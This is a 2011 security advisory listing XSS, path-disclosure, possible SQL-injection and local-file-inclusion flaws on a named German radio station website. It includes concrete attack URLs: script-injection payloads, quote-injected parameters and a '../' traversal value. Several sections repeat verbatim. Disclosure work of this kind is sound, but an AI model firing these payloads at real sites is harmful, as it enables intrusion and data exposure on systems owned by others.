SSCHADV2011-010 - Multiple vulnerabilities on http://www.salue.de/
Advisory: | Multiple vulnerabilities on http://www.salue.de/ |
Advisory ID: | SSCHADV2011-010 |
Author: |
Stefan Schurtz
|
Affected Software: | http://www.salue.de/ |
Vendor URL: | |
Vendor Status: |
informed
|
CVE-ID: | - |
======================
Vulnerability Description:
======================
The website "http://www.salue.de/" is prone to multiple XSS/SQL/FPD/LFI vulnerabilities
==============
Technical Details:
==============
Cross-Site-Scripting
Technical Details:
==============
Cross-Site-Scripting
http://www.salue.de/nachrichten/indexAudioArchiv.phtml -> Archiv-Suche -> Suchen -> /><script>alert(101.7);</script>
http://www.salue.de/anzeigen/indexRubrik.phtml?rubrik=search&searchBegriff=/><script>alert(101.7);</script> -> Service/News -> nach Begriff suchen
Full-Path-Disclosure
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/termineonline/index.phtml?search=true&dayX=15&monthX=9&yearX=aaaaa
http://www.salue.de/inside/team/profil.phtml?path_profil=../
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible SQL-Injection
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible LFI – local file inclusion
http://www.salue.de/inside/team/profil.phtml?path_profil=../
=====
Solution:
=====
-
================
Disclosure Timeline:
================
12-Aug-2011 – informed about the email "media@salue.de" -> no response
12-Aug-2011 – release date of this security advisory
22-Aug-2011 – informed about the email "stephanie.graesser@salue.de" -> no response
Full-Path-Disclosure
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/termineonline/index.phtml?search=true&dayX=15&monthX=9&yearX=aaaaa
http://www.salue.de/inside/team/profil.phtml?path_profil=../
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible SQL-Injection
http://www.salue.de/nachrichten/message.phtml?id=’&rubrik=regional
http://www.salue.de/nachrichten/message.phtml?id=27448’&rubrik=’
http://www.salue.de/nachrichten/index.phtml?rubrik=sport’
http://www.salue.de/musik/starnews/index.phtml?limit=’
Possible LFI – local file inclusion
http://www.salue.de/inside/team/profil.phtml?path_profil=../
=====
Solution:
=====
-
================
Disclosure Timeline:
================
12-Aug-2011 – informed about the email "media@salue.de" -> no response
12-Aug-2011 – release date of this security advisory
22-Aug-2011 – informed about the email "stephanie.graesser@salue.de" -> no response
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.salue.de/
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.salue.de/
Comments
Display comments as Linear | Threaded